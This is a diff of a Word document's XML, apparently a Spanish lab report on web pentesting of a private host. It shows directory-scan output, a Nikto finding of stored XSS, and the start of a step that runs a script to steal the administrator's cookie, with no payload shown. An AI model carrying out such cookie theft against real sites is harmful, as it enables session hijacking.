+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                                                                                                                </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>---- Entering directory: http://10.0.2.20/css/ ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                                                                                                                </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>---- Entering directory: http://10.0.2.20/images/ ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">                                                                                                                </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>---- Entering directory: http://10.0.2.20/admin/uploads/ ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                                                                                                                </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>---- Entering directory: http://10.0.2.20/css/ ----</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                                                                                                                </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>---- Entering directory: http://10.0.2.20/images/ ----</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                                                                                                                </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>---- Entering directory: http://10.0.2.20/admin/uploads/ ----</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
@@ -1415,6 +1508,131 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">mediante </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ikto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">omprobamos </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>que</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> es vulnerable a XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>stored</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -1427,7 +1645,41 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>3.- Comprobamos si es vulnerable a XSS:</w:t>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70E4885B" wp14:editId="50025750">
+            <wp:extent cx="5399115" cy="4513322"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="1945901404" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1945901404" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5424858" cy="4534842"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -1446,9 +1698,9 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3010B4AB" wp14:editId="2762A5CB">
-            <wp:extent cx="5400040" cy="3100705"/>
-            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3010B4AB" wp14:editId="5184D579">
+            <wp:extent cx="5398786" cy="2298224"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
             <wp:docPr id="90384562" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1461,7 +1713,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1469,7 +1721,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="3100705"/>
+                      <a:ext cx="5455991" cy="2322576"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1486,65 +1738,21 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>4</w:t>
       </w:r>
       <w:r>
@@ -1552,8 +1760,8 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">.- </w:t>
       </w:r>
@@ -1562,8 +1770,8 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Se e</w:t>
       </w:r>
@@ -1572,8 +1780,8 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>jecut</w:t>
       </w:r>
@@ -1582,28 +1790,18 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a un </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>script</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>a un script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> para </w:t>
       </w:r>
@@ -1612,8 +1810,8 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>extraer la</w:t>
       </w:r>
@@ -1622,8 +1820,8 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -1632,8 +1830,8 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">cookie </w:t>
       </w:r>
@@ -1642,48 +1840,18 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">del </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>admin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">istrador </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
